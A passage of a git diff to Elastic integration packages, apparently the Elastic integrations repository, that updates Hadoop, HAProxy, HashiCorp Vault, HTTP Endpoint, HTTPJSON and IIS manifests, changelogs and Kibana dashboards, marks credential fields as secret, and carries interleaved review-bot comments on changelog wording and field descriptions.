"781bec53-7762-43ba-bc46-4a54c6b985ae", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Cached blocks [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-781bec53-7762-43ba-bc46-4a54c6b985ae", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/hadoop/kibana/lens/hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index cdb352528a1..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2.json +++ /dev/null @@ -1,66 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "011f4580-0ed6-43f2-aeb7-64965ecd5e83": { - "columnOrder": [ - "7fd9ea12-b127-443d-a3d9-a07be9982c13" - ], - "columns": { - "7fd9ea12-b127-443d-a3d9-a07be9982c13": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Failed volumes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.volumes.failed" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "hadoop.datanode.volumes.failed : * " - }, - "visualization": { - "accessor": "7fd9ea12-b127-443d-a3d9-a07be9982c13", - "layerId": "011f4580-0ed6-43f2-aeb7-64965ecd5e83", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Failed Volumes [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-011f4580-0ed6-43f2-aeb7-64965ecd5e83", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/hadoop/kibana/lens/hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index 6880e46cdca..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2.json +++ /dev/null 
@@ -1,92 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ee57a119-2827-4586-82f1-c796c86d76d9": { - "columnOrder": [ - "abfc2ae3-27f7-4529-a9b9-01d7a9896323", - "0a1b5433-d3cf-4c1d-8e22-137912b624bb" - ], - "columns": { - "0a1b5433-d3cf-4c1d-8e22-137912b624bb": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - }, - "abfc2ae3-27f7-4529-a9b9-01d7a9896323": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Data node address", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "service.address" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"hadoop.datanode\" " - }, - "visualization": { - "columns": [ - { - "columnId": "abfc2ae3-27f7-4529-a9b9-01d7a9896323", - "isTransposed": false - }, - { - "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", - "isTransposed": false - } - ], - "layerId": "ee57a119-2827-4586-82f1-c796c86d76d9", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } - }, - "title": "List of data node address [Metrics Hadoop]", - "visualizationType": "lnsDatatable" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ee57a119-2827-4586-82f1-c796c86d76d9", - "type": "index-pattern" - } - ], - "type": "lens" -} \ 
No newline at end of file diff --git a/packages/hadoop/manifest.yml b/packages/hadoop/manifest.yml index 4c2a9822f20..29f4d217e62 100644 --- a/packages/hadoop/manifest.yml +++ b/packages/hadoop/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: hadoop title: Hadoop -version: "1.5.0" +version: "1.5.2" description: Collect metrics from Apache Hadoop with Elastic Agent. type: integration categories: diff --git a/packages/haproxy/_dev/build/docs/README.md b/packages/haproxy/_dev/build/docs/README.md index 1165e5eb170..f441bc0bca2 100644 --- a/packages/haproxy/_dev/build/docs/README.md +++ b/packages/haproxy/_dev/build/docs/README.md @@ -16,7 +16,7 @@ The `info` and `stat` datasets were tested with tested with HAProxy versions fro ## Troubleshooting -If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the `stat` data stream indices. +If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the `stat` data stream indices. ## Logs diff --git a/packages/haproxy/changelog.yml b/packages/haproxy/changelog.yml index 1dcb8c11f05..c8a30ee9407 100644 --- a/packages/haproxy/changelog.yml +++ b/packages/haproxy/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.11.1" + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: "1.11.0" changes: - description: Migrate metrics dashboards visualizations to lens. diff --git a/packages/haproxy/docs/README.md b/packages/haproxy/docs/README.md index a32f765d63b..46bb15e4404 100644 --- a/packages/haproxy/docs/README.md +++ b/packages/haproxy/docs/README.md 
@@ -16,7 +16,7 @@ The `info` and `stat` datasets were tested with tested with HAProxy versions fro ## Troubleshooting -If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the `stat` data stream indices. +If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the `stat` data stream indices. ## Logs diff --git a/packages/haproxy/manifest.yml b/packages/haproxy/manifest.yml index 8867f1359de..63e6c676cb7 100644 --- a/packages/haproxy/manifest.yml +++ b/packages/haproxy/manifest.yml @@ -1,6 +1,6 @@ name: haproxy title: HAProxy -version: "1.11.0" +version: "1.11.1" description: Collect logs and metrics from HAProxy servers with Elastic Agent. type: integration icons: diff --git a/packages/hashicorp_vault/changelog.yml b/packages/hashicorp_vault/changelog.yml index c2ceea3b536..a1e774c44a2 100644 --- a/packages/hashicorp_vault/changelog.yml +++ b/packages/hashicorp_vault/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.24.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9126 - version: "1.22.2" changes: - description: Changed owners diff --git a/packages/hashicorp_vault/data_stream/metrics/manifest.yml b/packages/hashicorp_vault/data_stream/metrics/manifest.yml index c064b7a9923..73d44fae7fe 100644 --- a/packages/hashicorp_vault/data_stream/metrics/manifest.yml +++ b/packages/hashicorp_vault/data_stream/metrics/manifest.yml 
@@ -20,12 +20,13 @@ streams: - http://localhost:8200 description: Vault addresses to monitor. `/v1/sys/metrics?format=prometheus` is automatically appended. - name: vault_token - type: text + type: password title: Vault Token multi: false required: true show_user: true description: A Vault token with read access to the /sys/metrics API. + secret: true - name: processors type: yaml title: Processors diff --git a/packages/hashicorp_vault/manifest.yml b/packages/hashicorp_vault/manifest.yml index dece2141689..d9d88ae6cb4 100644 --- a/packages/hashicorp_vault/manifest.yml +++ b/packages/hashicorp_vault/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: hashicorp_vault title: Hashicorp Vault -version: "1.22.2" +version: "1.24.0" description: Collect logs and metrics from Hashicorp Vault with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - iam conditions: kibana: - version: "^8.9.0" + version: "^8.12.0" screenshots: - src: /img/hashicorp_vault-audit-dashboard.png title: Audit Log Dashboard diff --git a/packages/http_endpoint/changelog.yml b/packages/http_endpoint/changelog.yml index 8ca059ece4c..569e32f48a6 100644 --- a/packages/http_endpoint/changelog.yml +++ b/packages/http_endpoint/changelog.yml @@ -1,3 +1,13 @@ +- version: "1.16.0" + changes: + - description: Allow user selection of HTTP method. + type: enhancement + link: https://github.com/elastic/integrations/pull/9311 +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs b/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs index 49b609a41fb..0e41a572137 100644 --- a/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs 
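Review bot: The Kibana constraint in packages/hashicorp_vault/manifest.yml moves from `^8.9.0` to `^8.12.0`, but the 1.24.0 changelog entry only says `Update package-spec to 3.0.3.`, so operators on 8.9–8.11 get no explanation of why the new version is no longer offered to them. Consider stating the raised minimum in the entry, e.g. `- description: Update package-spec to 3.0.3 and require Kibana 8.12.0 or later.`. The same omission applies to packages/http_endpoint/manifest.yml (`^7.16.0 || ^8.0.0` → `^8.12.0`) and packages/httpjson/manifest.yml (`^8.7.1` → `^8.12.0`), whose changelog entries also mention only the secret/method changes. If the raise is what `secret: true` on `vault_token` needs, saying so in the entry would make the jump self-explanatory.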
+++ b/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs @@ -1,5 +1,6 @@ data_stream: dataset: {{data_stream.dataset}} +method: {{method}} listen_address: {{listen_address}} listen_port: {{listen_port}} {{#if prefix}} diff --git a/packages/http_endpoint/data_stream/generic/manifest.yml b/packages/http_endpoint/data_stream/generic/manifest.yml index 5575d4952e1..1fbca609a99 100644 --- a/packages/http_endpoint/data_stream/generic/manifest.yml +++ b/packages/http_endpoint/data_stream/generic/manifest.yml @@ -6,6 +6,20 @@ streams: title: Custom HTTP Endpoint Logs template_path: http.yml.hbs vars: + - name: method + title: HTTP Method + description: This options specifies which HTTP method to accept. + type: select + required: true + show_user: false + options: + - value: POST + text: POST + - value: PUT + text: PUT + - value: PATCH + text: PATCH + default: POST - name: listen_address type: text title: Listen Address @@ -73,18 +87,21 @@ streams: description: If basic_auth is enabled, this is the password used for authentication against the HTTP listener. Requires username to also be set. required: false show_user: false + secret: true - name: secret_header type: text title: Secret Header description: The header to check for a specific value specified by secret.value. Certain webhooks provide the possibility to include a special header and secret to identify the source. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by secret.header. Certain webhooks provide the possibility to include a special header and secret to identify the source. required: false show_user: false + secret: true - name: hmac_header type: text title: HMAC Header 
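Review bot: The description of the new `method` variable in packages/http_endpoint/data_stream/generic/manifest.yml has a grammatical slip: `This options specifies which HTTP method to accept.` should read `This option specifies which HTTP method to accept.`. Because the variable is `show_user: false` with `default: POST`, this text is what an operator sees only after expanding advanced options, so it should be clean. The `secret: false` added on `secret_header` in the later hunk of the same file looks deliberate — the header name is not sensitive while `secret_value` is — and a comment above it such as `# header name only; the sensitive part lives in secret_value` would stop a future "mark everything secret" pass from flipping it.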
@@ -97,6 +114,7 @@ streams: description: The secret key used to calculate the HMAC signature. Typically, the webhook sender provides this value. required: false show_user: false + secret: true - name: hmac_type type: text title: HMAC Type diff --git a/packages/http_endpoint/manifest.yml b/packages/http_endpoint/manifest.yml index f7a23904acb..4a6f9e94894 100644 --- a/packages/http_endpoint/manifest.yml +++ b/packages/http_endpoint/manifest.yml @@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: http_endpoint title: Custom HTTP Endpoint Logs description: Collect JSON data from listening HTTP port with Elastic Agent. type: integration -version: "1.14.1" +version: "1.16.0" conditions: kibana: - version: "^7.16.0 || ^8.0.0" + version: "^8.12.0" categories: - custom - observability diff --git a/packages/httpjson/_dev/build/docs/README.md b/packages/httpjson/_dev/build/docs/README.md index 3fc5d9e079d..4bf8bc94add 100644 --- a/packages/httpjson/_dev/build/docs/README.md +++ b/packages/httpjson/_dev/build/docs/README.md @@ -4,6 +4,8 @@ The custom API input integration is used to ingest data from custom RESTful API' The input itself supports sending both GET and POST requests, transform requests and responses during runtime, paginate and keep a running state on information from the last collected events. +If you are starting development of a new custom HTTP API input, we recommend that you use the [Common Expression Language input](../cel/overview) which provides greater flexibility and an improved developer experience. + ## Configuration The extensive documentation for the input are currently available {{ url "filebeat-input-httpjson" "here" }}. diff --git a/packages/httpjson/changelog.yml b/packages/httpjson/changelog.yml index 4d9e9fb51d1..fb16a20021b 100644 --- a/packages/httpjson/changelog.yml +++ b/packages/httpjson/changelog.yml 
@@ -1,3 +1,13 @@ +- version: "1.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "1.19.0" + changes: + - description: Advise new projects to use CEL. + type: enhancement + link: https://github.com/elastic/integrations/pull/9018 - version: "1.18.1" changes: - description: Changed owners diff --git a/packages/httpjson/data_stream/generic/manifest.yml b/packages/httpjson/data_stream/generic/manifest.yml index 89b199f86c9..f4e680bf88a 100644 --- a/packages/httpjson/data_stream/generic/manifest.yml +++ b/packages/httpjson/data_stream/generic/manifest.yml @@ -54,6 +54,7 @@ streams: show_user: true required: false description: The password to be used with Basic Auth headers + secret: true - name: oauth_id type: text title: Oauth2 Client ID @@ -66,12 +67,14 @@ streams: description: Client secret used for Oauth2 authentication show_user: true required: false + secret: true - name: oauth_token_url type: text title: Oauth2 Token URL description: The URL endpoint that will be used to generate the tokens during the oauth2 flow. It is required if no oauth_custom variable is set or provider is not specified in oauth_custom variable. show_user: true required: false + secret: false - name: request_body type: yaml title: Request Body @@ -229,12 +232,13 @@ streams: multi: false required: false - name: oauth_google_credentials_json - type: text + type: password title: Oauth2 Google Credentials JSON description: Your Google credentials information as raw JSON. show_user: false multi: false required: false + secret: true - name: oauth_google_jwt_file type: text title: Oauth2 Google JWT File 
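Review bot: `oauth_google_credentials_json` in packages/httpjson/data_stream/generic/manifest.yml switches from `type: text` to `type: password` while its description still says `Your Google credentials information as raw JSON.`; if the password control is a single-line masked input, operators pasting multi-line service-account JSON may end up with a truncated or unverifiable value. The same change is made to `oauth_google_jwt_json` in the next hunk of this file. Making the expected format explicit, e.g. `description: Your Google credentials information as raw JSON on a single line.`, would avoid confusion, assuming a single line is indeed what the masked input requires — worth confirming against the Fleet form before wording it.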
@@ -243,12 +247,13 @@ streams: multi: false required: false - name: oauth_google_jwt_json - type: text + type: password title: Oauth2 Google JWT JSON description: Your Google JWT information as raw JSON. multi: false required: false show_user: false + secret: true - name: oauth_google_delegated_account type: text title: Oauth2 Google Delegated account diff --git a/packages/httpjson/docs/README.md b/packages/httpjson/docs/README.md index 98ad2aec473..e99bde9efce 100644 --- a/packages/httpjson/docs/README.md +++ b/packages/httpjson/docs/README.md @@ -4,6 +4,8 @@ The custom API input integration is used to ingest data from custom RESTful API' The input itself supports sending both GET and POST requests, transform requests and responses during runtime, paginate and keep a running state on information from the last collected events. +If you are starting development of a new custom HTTP API input, we recommend that you use the [Common Expression Language input](../cel/overview) which provides greater flexibility and an improved developer experience. + ## Configuration The extensive documentation for the input are currently available [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html). diff --git a/packages/httpjson/manifest.yml b/packages/httpjson/manifest.yml index 38d38eb70a9..a58c6214b82 100644 --- a/packages/httpjson/manifest.yml +++ b/packages/httpjson/manifest.yml @@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: httpjson title: Custom API description: Collect custom events from an API endpoint with Elastic agent type: integration -version: "1.18.1" +version: "1.20.0" conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" categories: - custom policy_templates: diff --git a/packages/iis/changelog.yml b/packages/iis/changelog.yml index 4512097ec52..5c11dd5dcda 100644 --- a/packages/iis/changelog.yml +++ b/packages/iis/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.17.4" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: "1.17.3" changes: - description: Update documentation for custom log format processing. diff --git a/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json index 210f9bec7ba..e60b5d7d96d 100644 --- a/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json +++ b/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json 
@@ -1,1748 +1,1768 @@ { - "attributes": { - "description": "This dashboard shows process and cache metrics for the IIS server.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "iis-2c171500-858b-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNCwxXQ==", + "attributes": { + "description": "This dashboard shows process and cache metrics for the IIS server.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [**Webserver processes**](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Webserver Process Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + 
"i": "1f700551-5464-467f-99ec-3b329e355195", + "w": 8, + "x": 10, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "1f700551-5464-467f-99ec-3b329e355195", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "182147bc-f15e-4d7e-80f0-f63350a5b838": { + "columnOrder": [ + "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", + "e563be1e-dc83-40f2-9047-b1a8edadf9e5", + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0", + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" + ], + "columns": { + "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.output_cache_current_memory_usage: *" + }, + "isBucketed": false, + "label": "Output Cache Current Memory Usage", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" + }, + "e563be1e-dc83-40f2-9047-b1a8edadf9e5": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "isFormulaBroken": false + }, + "references": [ + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" + ], + "scale": "ratio" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| 
[**Webserver processes**](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", - "openLinksInNewTab": false + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.output_cache_current_memory_usage: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" }, - "type": "markdown", - "uiState": {} + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "operationType": "overall_max", + "references": [ + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} } - }, - "gridData": { - "h": 5, - "i": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", - "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", - "title": "Navigation Webserver Process Overview", - "type": "visualization", - "version": "8.5.0" + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D3B515", + "layerId": "182147bc-f15e-4d7e-80f0-f63350a5b838", + "layerType": "data", + "maxAccessor": "e563be1e-dc83-40f2-9047-b1a8edadf9e5", + "metricAccessor": "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "182147bc-f15e-4d7e-80f0-f63350a5b838": { - "columnOrder": [ - "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", - "e563be1e-dc83-40f2-9047-b1a8edadf9e5", - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0", - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" - ], - "columns": { - "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.output_cache_current_memory_usage: *" - }, - "isBucketed": false, - "label": "Output Cache Current Memory Usage", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" - }, - "e563be1e-dc83-40f2-9047-b1a8edadf9e5": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "isFormulaBroken": false - }, - "references": [ - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" - ], - "scale": "ratio" - }, - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.output_cache_current_memory_usage: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" - }, - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1": { - "customLabel": true, - 
"dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "operationType": "overall_max", - "references": [ - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D3B515", - "layerId": "182147bc-f15e-4d7e-80f0-f63350a5b838", - "layerType": "data", - "maxAccessor": "e563be1e-dc83-40f2-9047-b1a8edadf9e5", - "metricAccessor": "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Output Cache Current Memory Usage" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "d2f639d2-4288-4110-871d-c123e43a8a5f", + "w": 10, + "x": 18, + "y": 0 + }, + "panelIndex": "d2f639d2-4288-4110-871d-c123e43a8a5f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b": { + "columnOrder": [ + "b1337d24-b9ec-486a-b473-0bd61f9a9676", + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0", + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" + ], + "columns": { + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.process.worker_process_count))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.process.worker_process_count))", + "isFormulaBroken": false + }, + "references": [ + 
"7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": "1f700551-5464-467f-99ec-3b329e355195", - "w": 8, - "x": 10, - "y": 0 - }, - "panelIndex": "1f700551-5464-467f-99ec-3b329e355195", - "title": "Output Cache Current Memory Usage", - "type": "lens", - "version": "8.5.0" + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.worker_process_count: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.worker_process_count" + }, + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", + "operationType": "overall_max", + "references": [ + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0" + ], + "scale": "ratio" + }, + "b1337d24-b9ec-486a-b473-0bd61f9a9676": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.worker_process_count: *" + }, + "isBucketed": false, + "label": "Worker Processes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.worker_process_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D33115", + "layerId": 